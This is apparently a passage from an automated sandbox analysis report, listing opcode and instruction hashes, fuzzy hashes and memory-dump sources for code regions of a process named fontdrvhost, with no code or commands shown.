                                                                    • Instruction Fuzzy Hash: 2EC1C130A09A4A8FE759EB6CC0A26B4B7A1FF54304F55417AD44EC7AD6CB28F951CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 12836718bf62932dc551c6b2a7925ffc3e7a439000fd2caad57608714b89b39c
                                                                    • Instruction ID: 2bff3c61880bc8cdbceebdd7dc0bfdda5943429333e43378560a0f9dc64dcc1d
                                                                    • Opcode Fuzzy Hash: 12836718bf62932dc551c6b2a7925ffc3e7a439000fd2caad57608714b89b39c
                                                                    • Instruction Fuzzy Hash: 1AB1D830B1CA478FE759DF68C4A06A4B7B1FF55384F9441B9C44EC7686DB28B861DB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9e6bdc1c939ff894455b0eca46882a2c3aa5104d6f6ab105b5434b6d5f165cdd
                                                                    • Instruction ID: 029d472ef03f1fc8c74f3d29b4167b23382bbeaa1973d062a8fe53c9835b9472
                                                                    • Opcode Fuzzy Hash: 9e6bdc1c939ff894455b0eca46882a2c3aa5104d6f6ab105b5434b6d5f165cdd
                                                                    • Instruction Fuzzy Hash: 8521C712F0F68B86F635F7EC64774F85B507F54218F9A05BAC48E860E2CC2D2645D396
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 362eb49a0590184f5cef7dc645826c8ff2bac8aca1adb32b9d62b4aff6fc7f1f
                                                                    • Instruction ID: b518f309ec5e2a1ad4d3c14e5441f0c9c8450b86d32ff8f37cf3f5361c98465c
                                                                    • Opcode Fuzzy Hash: 362eb49a0590184f5cef7dc645826c8ff2bac8aca1adb32b9d62b4aff6fc7f1f
                                                                    • Instruction Fuzzy Hash: 9421D712F0F29E8AF735F6ED1C752B86650BF81658F1A11B6C48E860EADC0C2945D382
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0454307fffd7aed31d3b31b3da5c99499f8cfe7af355d662c2f247008ad303b3
                                                                    • Instruction ID: eaaa1d0e56047af360477a3f34ecf21f76a826c6de59b02bc7d16d3eac21e6fb
                                                                    • Opcode Fuzzy Hash: 0454307fffd7aed31d3b31b3da5c99499f8cfe7af355d662c2f247008ad303b3
                                                                    • Instruction Fuzzy Hash: 36B1AF706196098FEB59DF58C0E09B137A1FF59314B6145BDC84B8B69FCB38E982CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 50207f5f71107bd09b4a3405214d4c90116fd511392a923c0a83704331b7cd3e
                                                                    • Instruction ID: f7fced70a37e16109d7173f00620f78cfcf5ba2eafc27968260f3835afde20f3
                                                                    • Opcode Fuzzy Hash: 50207f5f71107bd09b4a3405214d4c90116fd511392a923c0a83704331b7cd3e
                                                                    • Instruction Fuzzy Hash: 2211A352F0D39786F6395AE424350BC5D70AF517D1F5A03BBF9AE821C2EE4C68447286
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 68afaef5b6953533e4f1525c99668f09dd480dab2f893442c55b4c301e57a575
                                                                    • Instruction ID: b70f4db45e9bd3a7185824dfb47c28589c9010e1423c662888001bd2971c5c69
                                                                    • Opcode Fuzzy Hash: 68afaef5b6953533e4f1525c99668f09dd480dab2f893442c55b4c301e57a575
                                                                    • Instruction Fuzzy Hash: A841623270C9488FDF98EF58C4A6DA5B3E1FBA5311B0542AAD44AC3292DE31F845CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 961ed429700299cb2629a4bcd960c7d6fe093f1053d90534c89b63e1a8b26371
                                                                    • Instruction ID: 2781d08987d2eeb3e8269e88187e4408921325912781a9cf583f0c4f30a6cc01
                                                                    • Opcode Fuzzy Hash: 961ed429700299cb2629a4bcd960c7d6fe093f1053d90534c89b63e1a8b26371
                                                                    • Instruction Fuzzy Hash: C9415F3170CA598FDF98EF58D4A5DA4B7F1FBA8311B04426AD45EC3192DE31E845CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1c4f9e42fc082b3aba98ac7d027983bca76e93defea40369b41d30f18648aa65
                                                                    • Instruction ID: 61f4ed008fb49692a7ed1154cf2ba7257c1c66cd08c7a18344037d60746a404e
                                                                    • Opcode Fuzzy Hash: 1c4f9e42fc082b3aba98ac7d027983bca76e93defea40369b41d30f18648aa65
                                                                    • Instruction Fuzzy Hash: 933180316089488FDF98EF18C4A5DA4B3E1FFA9311B0542A9D44AC72A2DE31F845CF81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 01fcb229ef807c9e24ab714f946fb9af4d822728dde3cade96b6334c3d657bca
                                                                    • Instruction ID: 0888e790b25c6724d61982e5e7dc777bf43d372820ea67018148d102fa920061
                                                                    • Opcode Fuzzy Hash: 01fcb229ef807c9e24ab714f946fb9af4d822728dde3cade96b6334c3d657bca
                                                                    • Instruction Fuzzy Hash: BA317F3160CA598FDF98EF18C4A9DA477F1FBA8311B0542AAD45EC7192DE31E845CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d06b8c29d067c4a13b76cf71a47cc2f033d64cabbfaad89aeebacf3784688a8a
                                                                    • Instruction ID: 7f032cde75b66b19861fbca1963eaa0ff59c650b609999224a8b4f7990715317
                                                                    • Opcode Fuzzy Hash: d06b8c29d067c4a13b76cf71a47cc2f033d64cabbfaad89aeebacf3784688a8a
                                                                    • Instruction Fuzzy Hash: 52315820A1D85E4AEB78E65C8470AF473A1FF60304F1546BBC44FC71D6DD2CAA85C741
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c8d01110aee7568b5f5890892a04d55335d1103fdf8486786dff75f1091520d3
                                                                    • Instruction ID: 07ff8427713b6f4525be6f6aef295937799c9353db8fb423b5aeead293bb1f0c
                                                                    • Opcode Fuzzy Hash: c8d01110aee7568b5f5890892a04d55335d1103fdf8486786dff75f1091520d3
                                                                    • Instruction Fuzzy Hash: F23192317089498FDF98EF18C4A5DA4B3E1FFA8311B0542A9D40AC72A2DE35F845CF81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 854f65be2642ea73198727b78afb52202e139beeac3ff21239d2ef80abb0980c
                                                                    • Instruction ID: b1d21c6fd78104955d5226f5d3400dfc5d028b5aa6f50ab7b91c4e65efe49215
                                                                    • Opcode Fuzzy Hash: 854f65be2642ea73198727b78afb52202e139beeac3ff21239d2ef80abb0980c
                                                                    • Instruction Fuzzy Hash: E0318F3170CA498FDFA8EF58C4A9DA4B7F1FB68311B0442AAD45EC7192DE31E845CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bc91ef89f6298b63b3473d0a6a255c397b4a5eaadcbddcea9ff0e7963ce66785
                                                                    • Instruction ID: c1f34b6ac23ea3f99667dc8835e53ec1a9a76c342585c5a628ba1084c0dd8ff4
                                                                    • Opcode Fuzzy Hash: bc91ef89f6298b63b3473d0a6a255c397b4a5eaadcbddcea9ff0e7963ce66785
                                                                    • Instruction Fuzzy Hash: 8831AE32A0E68E8FDB95EBA8D8619FC7BB0FF55304F4601B6D049D71E3CA25A945C740
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6bc5287f743b5f4ce2ee92acb308ba82593c1583487663f2e37e13c474d684a1
                                                                    • Instruction ID: 89440e72cda120844aa214e8cfe007aef7d11bc1c55f2a53d8ac452508a0376f
                                                                    • Opcode Fuzzy Hash: 6bc5287f743b5f4ce2ee92acb308ba82593c1583487663f2e37e13c474d684a1
                                                                    • Instruction Fuzzy Hash: AB31C671E0EA8D9FEB66DB98C8645BC7BB1FF46304F0501BAD08DD72E2DA24A905C711
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0a23c30605631c01bd2b3539aa2c06ca24817389ba452e688064d2f22fb3ba91
                                                                    • Instruction ID: b2bdedd852cdc7de9227cea8618b8a76f80c73495762620138bd37661289af39
                                                                    • Opcode Fuzzy Hash: 0a23c30605631c01bd2b3539aa2c06ca24817389ba452e688064d2f22fb3ba91
                                                                    • Instruction Fuzzy Hash: A231072094E3C64FE753937498696E53F716F43364F1802EAE089CA4E3EB990409D752
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2395f90dff6c8738424643affce4bafa8dacfdc1de6265cb970a3c39c498e8f3
                                                                    • Instruction ID: 6f21d39507bfd25646123ae76dd9eb08f7eafee4fb02dbfada7db98cd49ccfc1
                                                                    • Opcode Fuzzy Hash: 2395f90dff6c8738424643affce4bafa8dacfdc1de6265cb970a3c39c498e8f3
                                                                    • Instruction Fuzzy Hash: 67312D71B0990E9FDB68EB9CD4619B8B3A1FF98314B115239D01EC3696DF24BD12CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e583476c18b4eb61fda2487d11de644b02067cf5584a8b3635f578a533d76d77
                                                                    • Instruction ID: bc0b64f022efee80efaa697feb0fd1e692f07291fa4dfe48f1108f231ef0e0a7
                                                                    • Opcode Fuzzy Hash: e583476c18b4eb61fda2487d11de644b02067cf5584a8b3635f578a533d76d77
                                                                    • Instruction Fuzzy Hash: 3F310371F1891B9FDB64EB98D4A19ACB3B1FF58351B10427AE01ED3681DF247C129B80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C10A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C10A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c10a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b2aa247de54839127dd083d8eaf05a3c4d90f2af6da3f8a2f84ccd6b6305ac8d
                                                                    • Instruction ID: 77e331a2daba373bf82137d891a47351df6526ac7c204139f39068c6fe8714cd
                                                                    • Opcode Fuzzy Hash: b2aa247de54839127dd083d8eaf05a3c4d90f2af6da3f8a2f84ccd6b6305ac8d
                                                                    • Instruction Fuzzy Hash: 6D31B771A0882D8FDFA4DF18C898FA877B1FB69305F1001DA900EE7261DA35AE81CF44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e5e849796166f180b90d3380ee75f179ac513dd747df6b26e72e39eb12ae6bd0
                                                                    • Instruction ID: 1d9cced6685459f8fc41ec11cc636d3e59010ecdd67d483a78bf94dc9c2843e5
                                                                    • Opcode Fuzzy Hash: e5e849796166f180b90d3380ee75f179ac513dd747df6b26e72e39eb12ae6bd0
                                                                    • Instruction Fuzzy Hash: 04313930A1A94ECFEB79EB9884655BD76A1FF84304F5201BAD40EC22E1DA38BA40C741
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4e7364e946eb7eea46d5ffb45bb4b442e425ba0bd722cb01b7d0724e85946e3b
                                                                    • Instruction ID: fa747ca7cf611f45b55006f53fd0e7a3e83abe8bf5d257789ebacdb8aeb73d48
                                                                    • Opcode Fuzzy Hash: 4e7364e946eb7eea46d5ffb45bb4b442e425ba0bd722cb01b7d0724e85946e3b
                                                                    • Instruction Fuzzy Hash: 63316A32E1A94E9FEBA9EF8A84655BD77B1FF54304F52017AD10EC22E1CA786A00D741
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e687aefe064dc1f2140455c3d37cb40289cfe4db2e3b99e4abf214ff7c9378b5
                                                                    • Instruction ID: 1d91d3d2877db09d430995ef7c5715da6b92666cd1ce64c3c69ab14627803d31
                                                                    • Opcode Fuzzy Hash: e687aefe064dc1f2140455c3d37cb40289cfe4db2e3b99e4abf214ff7c9378b5
                                                                    • Instruction Fuzzy Hash: 6D31CC70E1861E9FDFA8DB58C4A5AADB7B1EF58311F0041BAD01EE3291DF34A9819B40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6989cec008a79f7d2ad8e7a6f4d23abe501b70d67dd67fa566e975ae9560cd01
                                                                    • Instruction ID: fa6270320183b4b86babebbe45e526edb1d2a38b7ad7560e2b032b4c0bf6e9d5
                                                                    • Opcode Fuzzy Hash: 6989cec008a79f7d2ad8e7a6f4d23abe501b70d67dd67fa566e975ae9560cd01
                                                                    • Instruction Fuzzy Hash: CB31FD30E186199FDFA8DB58C4A5BA97BB1FB58381F1101BEE05EE3291DB34A9409B00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 149dbb8f24f3a35513e3fda55a13e14de6aaab994e4fb95ca62f833113a1fd60
                                                                    • Instruction ID: 2017add94f6099dfa3ece0fd8bcab1de947be9f8b08ce2c57f1a1418bffe21ed
                                                                    • Opcode Fuzzy Hash: 149dbb8f24f3a35513e3fda55a13e14de6aaab994e4fb95ca62f833113a1fd60
                                                                    • Instruction Fuzzy Hash: E8110431F09A479FD764AB6494214FA73B0FF51250F00467BE00EC34D2EF2869059790
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: aae09cef7b7b053cff9dbb9c53c9dae4900879548dc78ca6becbd643ad12df87
                                                                    • Instruction ID: 52e2270ca44b9891215a622e14f4f21a7cc28b26c55b8d3ee0e1559745f5b89d
                                                                    • Opcode Fuzzy Hash: aae09cef7b7b053cff9dbb9c53c9dae4900879548dc78ca6becbd643ad12df87
                                                                    • Instruction Fuzzy Hash: 50118231B1590A8AD764FFA8D0215FAB391FF54319F01463AD40EC35D6DE28BA45C780
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3db7fedf07314a23f97f518f537fa08a4d9c1019bc4ff65f3cda65f7f8d89825
                                                                    • Instruction ID: 90082cb1f25859be685cc8a694a8d1412ea90eaf7987c0141148a2c80623ca48
                                                                    • Opcode Fuzzy Hash: 3db7fedf07314a23f97f518f537fa08a4d9c1019bc4ff65f3cda65f7f8d89825
                                                                    • Instruction Fuzzy Hash: 3F11BF31B08A0B9AEB64FB64D0615FAB3E1FF94385F40063AE00EC3582DF29A8549790
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b2085ea5bff55fd1210e195a60db4143d4bee62655c4616d6f447c5a798861fd
                                                                    • Instruction ID: 9fe88d21607f7794cb6c42763a72a4ad5fd4f3cc9b1c17002e177e31e6721935
                                                                    • Opcode Fuzzy Hash: b2085ea5bff55fd1210e195a60db4143d4bee62655c4616d6f447c5a798861fd
                                                                    • Instruction Fuzzy Hash: 21118F30F1990A8EDB64FB68D4615FA73A1FF94309F41463AD44AC35E6CE38A9458780
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0a4b0105a96f4ddb193713f1c7bef47ba69783a3a3da7d7fbddda07b52943b67
                                                                    • Instruction ID: 1256cd22280aa49f6c923d1a028cb0e7113e8ad777b4632cb920f721ae0a7700
                                                                    • Opcode Fuzzy Hash: 0a4b0105a96f4ddb193713f1c7bef47ba69783a3a3da7d7fbddda07b52943b67
                                                                    • Instruction Fuzzy Hash: 1C010471F0A60D9FE770EAAC84382BE75A1FB49345F01403AD40ED72E1DE656D01C381
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1d5a4441a53211e34f7add87eda1e4b8096185ec6371564d9809cb3c95ef3a77
                                                                    • Instruction ID: 1ae1388f66b7955b3724af4b3a18bfba6367ce16cbdb1f6dc749dffca0dfe73f
                                                                    • Opcode Fuzzy Hash: 1d5a4441a53211e34f7add87eda1e4b8096185ec6371564d9809cb3c95ef3a77
                                                                    • Instruction Fuzzy Hash: D211C430F0990A9EDB64FF68E4254F673E0FFA4208B40063AD04EC31E6CE38A941C780
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b5b034cd754db6d803c2c0b128ce2430ecbfb59e52cf770dceb3fa77b2c0a566
                                                                    • Instruction ID: b69f12e0611f9a345deceb956830f5e2968648bcf0487677927f6fab18a2acac
                                                                    • Opcode Fuzzy Hash: b5b034cd754db6d803c2c0b128ce2430ecbfb59e52cf770dceb3fa77b2c0a566
                                                                    • Instruction Fuzzy Hash: 57010832A0974A5FD370DAA488682E53AF1EB55390F04427BE00DE3151EE6859458391
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2c108dec0b9a279250a34a7261219bb93a7055ac617b473e501216dd8156c3ff
                                                                    • Instruction ID: c0ad12ae93e363390e928ff0fd0f6f8d881f4bc045a22a85b4deca263c84cb67
                                                                    • Opcode Fuzzy Hash: 2c108dec0b9a279250a34a7261219bb93a7055ac617b473e501216dd8156c3ff
                                                                    • Instruction Fuzzy Hash: A1118E31B0550A8FE725EE98D4662F57394FB95319F11453BD509C36E0DB29AA90CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fa4ebd6e331336cb6af8eafdff783a8e3b8b668cf67e4e3796640b24b16a3c65
                                                                    • Instruction ID: 4646f79609179770be07562ef90b0e4fd3de962474101fa8ad9ca306ab43c45e
                                                                    • Opcode Fuzzy Hash: fa4ebd6e331336cb6af8eafdff783a8e3b8b668cf67e4e3796640b24b16a3c65
